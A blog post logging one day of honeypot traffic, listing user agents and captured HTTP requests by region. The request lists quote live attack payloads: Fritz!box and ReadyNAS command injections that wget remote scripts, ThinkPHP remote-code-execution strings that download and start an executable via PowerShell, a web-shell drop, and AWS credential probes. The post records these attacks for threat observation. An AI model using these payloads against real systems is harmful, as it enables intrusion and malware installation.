Hello, Clear and Bright Blue Sky

With time on my hands, I spend the whole day facing this blog, jotting down at random whatever trivial thoughts drift through my mind.

2019/08/11 Honeypot (tentative) observation log

This is the honeypot (tentative) observation log for 2019/08/11.

Highlights
Region:AP

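The following were observed:
Access attempts targeting an AVM Fritz!box vulnerability
Access attempts targeting a ThinkPHP vulnerability
Scanning for AWS credential information
Scanning with masscan
Unauthorized traffic involving 110[.]249[.]212[.]46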

Region:US

The following were observed:
Access attempts targeting a ReadyNAS Surveillance vulnerability

Region:EU

The following were observed:
Access attempts targeting a ThinkPHP vulnerability
Scanning for AWS credential information
Scanning with masscan

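Access count trend

AP: total accesses: 31 (change from previous day: -18)
US: total accesses: 12 (change from previous day: -18)
EU: total accesses: 33 (change from previous day: +24)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.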

Region:AP

Source IP addresses


User-Agent list

Count UserAgent
12 -
4 Go-http-client/1.1
3 masscan/1.0 (https://github.com/robertdavidgraham/masscan)
2 Mozilla/5.0
2 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
5 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
3 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

Request list

Count Method Request Protocol
1 -
1 GET /admin-console/login.seam HTTP/1.1\n
1 GET /.aws/credentials HTTP/1.0
2 GET /.aws/credentials HTTP/1.1
1 GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20wget%20http://91[.]92[.]66[.]192/xd.sh%20%26 HTTP/1.1
1 GET /evox/about HTTP/1.1]
1 GET /HNAP1 HTTP/1.1
3 GET http://110[.]249[.]212[.]46/testget?q=23333&port=80 HTTP/1.1
1 GET /nmaplowercheck1565401025 HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /shell?busybox HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /webadmin/script?command= busybox|HTTP/1.1
3 HEAD /acadmin.php HTTP/1.1
1 HEAD / HTTP/1.1
2 HEAD /robots.txt HTTP/1.0
4 HEAD /robots.txt HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /TP/index.php?s=captcha HTTP/1.1

Region:US

Source IP addresses


User-Agent list

Count UserAgent
5 -
1 Go-http-client/1.1
1 Mozilla/5.0
5 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36

Request list

Count Method Request Protocol
1 -
1 GET /evox/about HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /nmaplowercheck1565399584 HTTP/1.1
1 GET /shell?busybox HTTP/1.1
1 GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://185[.]164[.]72[.]155/richard;
1 GET /xmlrpc.php HTTP/1.1
1 HEAD /acadmin.php HTTP/1.1
1 HEAD / HTTP/1.1
2 HEAD /robots.txt HTTP/1.0
1 POST /sdk HTTP/1.1

Region:EU

Source IP addresses


User-Agent list

Count UserAgent
8 -
3 Go-http-client/1.1
1 masscan/1.0 (https://github.com/robertdavidgraham/masscan)
3 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
18 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

Request list

Count Method Request Protocol
1 -
1 GET /.aws/credentials HTTP/1.0
2 GET /elrekt.php HTTP/1.1
2 GET /html/public/index.php HTTP/1.1
2 GET /index.php HTTP/1.1
2 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /myadmin/scripts/setup.php HTTP/1.1\n
1 GET /phpmyadmin2/scripts/setup.php HTTP/1.1\n
1 GET /phpMyAdmin/scripts/setup.php HTTP/1.1\n
1 GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://wiu[.]fxxxxxxk[.]me/download.exe','%SystemRoot%/Temp/gniskhechzvynsu22693.exe');start%20%SystemRoot%/Temp/gniskhechzvynsu22693.exe HTTP/1.1
2 GET /public/index.php HTTP/1.1
1 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://wiu[.]fxxxxxxk[.]me/download.exe','%SystemRoot%/Temp/gniskhechzvynsu22693.exe');start%20%SystemRoot%/Temp/gniskhechzvynsu22693.exe HTTP/1.1
1 GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1
1 GET /scripts/setup.php HTTP/1.1\n
2 GET /thinkphp/html/public/index.php HTTP/1.1
2 GET /TP/html/public/index.php HTTP/1.1
2 GET /TP/index.php HTTP/1.1
2 GET /TP/public/index.php HTTP/1.1
1 GET /xmlrpc.php HTTP/1.1
1 HEAD /acadmin.php HTTP/1.1
2 HEAD /robots.txt HTTP/1.0
2 POST /index.php?s=captcha HTTP/1.1